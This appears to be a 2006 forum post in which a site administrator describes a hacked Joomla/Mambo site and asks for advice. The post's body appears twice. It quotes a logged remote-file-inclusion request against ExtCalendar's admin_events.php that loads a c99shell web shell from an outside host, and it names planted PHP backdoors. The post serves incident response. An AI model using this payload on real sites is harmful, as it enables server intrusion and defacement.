dkone
August 9th, 2006, 09:06
Hey guys, should this be a warning?? -->HacKeD By TamTurk<--
we got hacked twice last night. We are pretty sure the little fcuk's used extcalendar2 to get a Backdoor.PHP trojan onto the server. And we know what that means, yes,...everything is pretty fcuked. We fixed it but they left yet another little PHPshell (c99shell) hidden deep down,...and thew whole thing started again. Particularly emberassing for our clients as the site got defaced pretty badly with some Islam/Terror stuff,....
We went trough all the logs and actually found out that the stuff slept there for quite a while. Furthermore, we are pretty damn sure the files were placed trough:
.../components/com_extcalendar/admin_events.php
The whole command looked like this:
.../components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=htt p%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F&act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a"
Also, this php file did not have any defined( '_VALID_MOS' ) line...
We checked out other potential vulnerable scripts as the upload facilities of Docman and ZOOm,...but they are both upload facilities disbaled in the fron-end,..and the files seem secure,...
Any opinions:mad: :mad: :mad: :confused: :confused: :confused: ns
we got hacked twice last night. We are pretty sure the little fcuk's used extcalendar2 to get a Backdoor.PHP trojan onto the server. And we know what that means, yes,...everything is pretty fcuked. We fixed it but they left yet another little PHPshell (c99shell) hidden deep down,...and thew whole thing started again. Particularly emberassing for our clients as the site got defaced pretty badly with some Islam/Terror stuff,....
We went trough all the logs and actually found out that the stuff slept there for quite a while. Furthermore, we are pretty damn sure the files were placed trough:
.../components/com_extcalendar/admin_events.php
The whole command looked like this:
.../components/com_extcalendar/admin_events.php?CONFIG_EXT%5BLANGUAGES_DIR%5D=htt p%3A%2F%2Fsvt.nukleon.us%2Ftools%2Fc99shell.txt%3F&act=ls&d=%2Fweb%2Fsites%2Fuser%2F12%2F&sort=0a"
Also, this php file did not have any defined( '_VALID_MOS' ) line...
We checked out other potential vulnerable scripts as the upload facilities of Docman and ZOOm,...but they are both upload facilities disbaled in the fron-end,..and the files seem secure,...
Any opinions:mad: :mad: :mad: :confused: :confused: :confused: ns